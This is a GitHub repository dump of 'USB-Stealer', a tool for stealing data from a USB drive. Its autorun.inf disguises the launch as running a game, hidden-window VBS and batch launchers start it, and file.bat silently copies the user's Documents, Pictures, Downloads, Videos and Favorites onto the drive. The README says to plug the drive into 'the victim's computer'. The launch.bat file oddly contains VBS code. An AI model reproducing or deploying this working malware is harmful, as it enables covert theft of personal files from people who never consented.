├── images ├── demo.png ├── usb.png ├── use.gif └── usb-stealer-ascii.png ├── invisible.vbs ├── launch.bat ├── autorun.inf ├── file.bat └── README.md /images/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/demo.png -------------------------------------------------------------------------------- /images/usb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/usb.png -------------------------------------------------------------------------------- /images/use.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/use.gif -------------------------------------------------------------------------------- /invisible.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /launch.bat: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /images/usb-stealer-ascii.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/usb-stealer-ascii.png -------------------------------------------------------------------------------- /autorun.inf: -------------------------------------------------------------------------------- 1 | [autorun] 2 | icon=drive.ico 3 | open=launch.bat 4 | action=Click ok to Run game for Windows 5 | shell\open\command=launch.bat -------------------------------------------------------------------------------- /file.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title USB-Stealer 3 | color 2 4 | SET odrive=%odrive:~0,2% 5 | set backupcmd=xcopy /s /c /d /e /h /i /r /y 6 | cls 7 | echo on 8 | %backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents" 9 | %backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 10 | %backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 11 | %backupcmd% "%USERPROFILE%\Downloads" "%drive%\all\Downloads" 12 | %backupcmd% "%USERPROFILE%\videos" "%drive%\all\videos" 13 | @echo off 14 | cls 15 | exit 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | 4 |
5 |

6 | 7 | ## Installation 8 | Download from [releases](https://github.com/skylartr/USB-Stealer/releases)
9 | Extract contents of .zip onto the root of a USB 10 | ## Usage 11 | **Warning!!** **Run this on your computer at your own risk!**
12 | Plug it into the victim's computer; if autorun is disabled, run file.bat to manually run
13 | All files will be copied onto the USB drive into a folder called 'all'
14 | 15 |

16 |
17 | 18 |

19 | 20 | ## Hardware ![usb](/images/usb.png) 21 | I carry this on a generic 32GB USB 2.0
22 | Most, if not all, flash drives should work fine
23 | USB 3.0 formatted to exFAT or NTFS reccomended
24 | The bigger your target is, the more storage you should have
25 | 26 | ## Issues 27 | The usb autorun will not work on most modern Windows releases
28 | Because this is designed for standard usb and not a BadUSB [which has keyboard emulating capabilities and can launch scripts]
29 | So you dont need to download autorun.inf, launch.bat, or invisible.vbs
30 | --------------------------------------------------------------------------------